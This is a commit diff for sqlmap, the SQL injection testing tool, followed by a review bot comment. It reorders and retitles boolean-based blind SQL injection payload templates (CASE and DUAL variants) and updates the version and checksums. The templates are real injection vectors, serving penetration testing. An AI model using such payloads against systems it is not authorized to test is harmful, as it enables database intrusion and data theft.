
Commit bc7ab01

committed
Bug fix for generic parameter replacement (CASE)
1 parent 212c1ec commit bc7ab01

3 files changed

Lines changed: 30 additions & 34 deletions


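--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.revision import getRevisionNumber
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.41"
+VERSION = "1.0.9.42"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}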

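--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
-f736ee4e7e504498859dce2171991550 lib/core/settings.py
+f9c92d337bfea55d24d24ae514e42a84 lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
 0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py
@@ -449,7 +449,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
 fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
 a279656ea3fcb85c727249b02f828383 xml/livetests.xml
-18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
+48ec50e72db89cb8f7bf25e9f45cfc92 xml/payloads/boolean_blind.xml
 103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
 96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml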

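--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@@ -879,74 +879,70 @@ Tag: <test>
 </details>
 </test>
 
+<!-- Works in MySQL, Oracle, etc. -->
 <test>
-<title>SAP MaxDB boolean-based blind - Parameter replace</title>
+<title>Boolean-based blind - Parameter replace (DUAL)</title>
 <stype>1</stype>
-<level>3</level>
+<level>2</level>
 <risk>1</risk>
-<clause>1,3</clause>
+<clause>1,2,3</clause>
 <where>3</where>
-<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
+<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
 <request>
-<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
+<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
 </request>
 <response>
-<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
+<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
 </response>
-<details>
-<dbms>SAP MaxDB</dbms>
-</details>
 </test>
 
 <test>
-<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
+<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
 <stype>1</stype>
-<level>4</level>
+<level>3</level>
 <risk>1</risk>
-<clause>1,3</clause>
+<clause>1,2,3</clause>
 <where>3</where>
-<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
 <request>
-<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
 </request>
 <response>
-<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
 </response>
-<details>
-<dbms>SAP MaxDB</dbms>
-</details>
 </test>
+<!-- End of boolean-based blind tests - Parameter replace -->
 
-<!-- Works in MySQL, Oracle, etc. -->
+<!-- Works in SAP MaxDB, Informix, etc. -->
 <test>
-<title>Boolean-based blind - Parameter replace (DUAL)</title>
+<title>Boolean-based blind - Parameter replace (CASE)</title>
 <stype>1</stype>
-<level>2</level>
+<level>3</level>
 <risk>1</risk>
-<clause>1,2,3</clause>
+<clause>1,3</clause>
 <where>3</where>
-<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
+<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
 <request>
-<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
+<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
 </request>
 <response>
-<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
+<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
 </response>
 </test>
 
 <test>
-<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
+<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
 <stype>1</stype>
-<level>3</level>
+<level>4</level>
 <risk>1</risk>
-<clause>1,2,3</clause>
+<clause>1,3</clause>
 <where>3</where>
-<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
+<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
 <request>
-<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
+<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
 </request>
 <response>
-<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
+<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
 </response>
 </test>
 <!-- End of boolean-based blind tests - Parameter replace -->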
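Review bot: The added `<!-- End of boolean-based blind tests - Parameter replace -->` comment at new line 914 closes the section too early, because the two CASE tests after it are also parameter-replace tests and the original end marker is still present at new line 948. The file now carries the same marker twice; I would drop the added one or reword it, for example `<!-- End of DUAL variants -->`. The `(CASE)` suffix in the new titles also does not separate these tests from the DUAL pair, whose vectors are CASE expressions too, so a suffix naming the ELSE branch would be clearer. With the `<details><dbms>SAP MaxDB</dbms></details>` element removed, the comment `Works in SAP MaxDB, Informix, etc.` is the only remaining record of the intended back-ends. It should say that the tests are presumably no longer tied to one DBMS.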
